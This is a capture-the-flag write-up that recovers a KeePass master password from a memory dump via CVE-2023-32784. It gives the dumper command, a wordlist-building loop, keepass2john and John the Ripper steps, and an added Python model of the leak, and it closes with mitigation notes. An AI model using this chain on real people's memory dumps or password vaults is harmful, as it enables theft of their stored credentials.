Forensics - KeePass password recovery

Scenario - KeePass Memory Dump Exploit – CVE-2023-32784

We were provided with:

  • A memory dump
  • A KeePass database file (.kdbx)

Our goal: Extract the master password and retrieve the flag from the KeePass database.


Tools Used

  • keepass-password-dumper – PoC tool for CVE-2023-32784
  • keepass2john + John the Ripper – to brute-force the password
  • KeePass – to open the database and view entries

Step-by-Step

1. Dumping the Password from Memory

I used the tool keepass-password-dumper to analyze the memory dump:

dotnet run memdump.bin

This revealed the password minus its first character; every other character was recovered in order.

Screenshot: Part of a password

2. Generating Possible Passwords

I generated a wordlist by prepending every printable ASCII character (A–Z, a–z, 0–9 and the symbols) to the recovered partial password:

for i in {32..126}; do   # every printable ASCII code, from space through '~'
    printf "\\$(printf '%03o' "$i")%s\n" '<partial_password>'
done > passwords.txt

Then converted the KeePass database to a hash format:

keepass2john database.kdbx > hash.txt

Cracked it with:

john --wordlist=passwords.txt hash.txt

John successfully cracked the full password.
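Why the dump yields everything except the first character, and why step 2 needs only 95 candidates, follows from the leak pattern described in the CVE-2023-32784 advisory: KeePass's masked text box leaves, for each keystroke after the first, a string of mask bullets followed by the character just typed. The first keystroke has no bullets in front of it, so nothing marks it. The following Python is an added example, not part of this writeup or of keepass-password-dumper; it models that pattern on a constructed password and builds the same candidate list as the bash loop above. It does not parse memory dumps.

```python
# Added example: a constructed model of the CVE-2023-32784 leak pattern
# and of the candidate list from step 2. The password below is made up.
import random

MASK = "\u25cf"  # the bullet KeePass's masked text box displays for each typed character


def leftover_strings(password: str) -> list[str]:
    """Model the per-keystroke remnants described in the advisory.

    Keystroke N (N > 1) leaves a string of N-1 mask characters followed by
    the typed character. Keystroke 1 leaves nothing, which is why recovery
    always starts at the second character of the password.
    """
    return [MASK * (n - 1) + ch for n, ch in enumerate(password, start=1) if n > 1]


def reassemble(remnants: list[str]) -> str:
    """Order the remnants by their mask count and join the trailing characters.

    Memory order is not guaranteed, so the remnants may arrive shuffled;
    the number of masks gives each character its position.
    """
    ordered = sorted(remnants, key=lambda s: s.count(MASK))
    return "".join(s[-1] for s in ordered)


def candidates(partial: str) -> list[str]:
    """Every printable ASCII character (space through '~', 95 in total) prepended to the partial."""
    return [chr(code) + partial for code in range(32, 127)]


if __name__ == "__main__":
    secret = "P@ssw0rd!"  # constructed example password
    remnants = leftover_strings(secret)
    random.shuffle(remnants)  # simulate remnants found in arbitrary order
    partial = reassemble(remnants)
    wordlist = candidates(partial)
    print("recovered tail:", partial)
    print("candidates:", len(wordlist), "contains full password:", secret in wordlist)
```

The point for a defender is that the strength of the master password plays no role here: once the remnants are present, the search space collapses to one character, so the only effective mitigations are the patched KeePass build and keeping process memory, crash dumps, pagefile and hibernation data away from unauthorised readers.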


3. Opening the Database and Retrieving the Flag

I opened the KeePass database using the recovered master password.

Inside, we found an entry titled "Junior Crypto 2025" with a congratulatory message in the notes and the flag in the password field.

Screenshot: KeePass Flag Entry

Result

✅ Password recovered via memory dump
✅ KeePass database unlocked
✅ Flag retrieved from entry


Notes

  • This attack is based on CVE-2023-32784
  • Exploits plaintext remnants of the KeePass master password in RAM
  • Requires only memory access – no elevated privileges or active KeePass session needed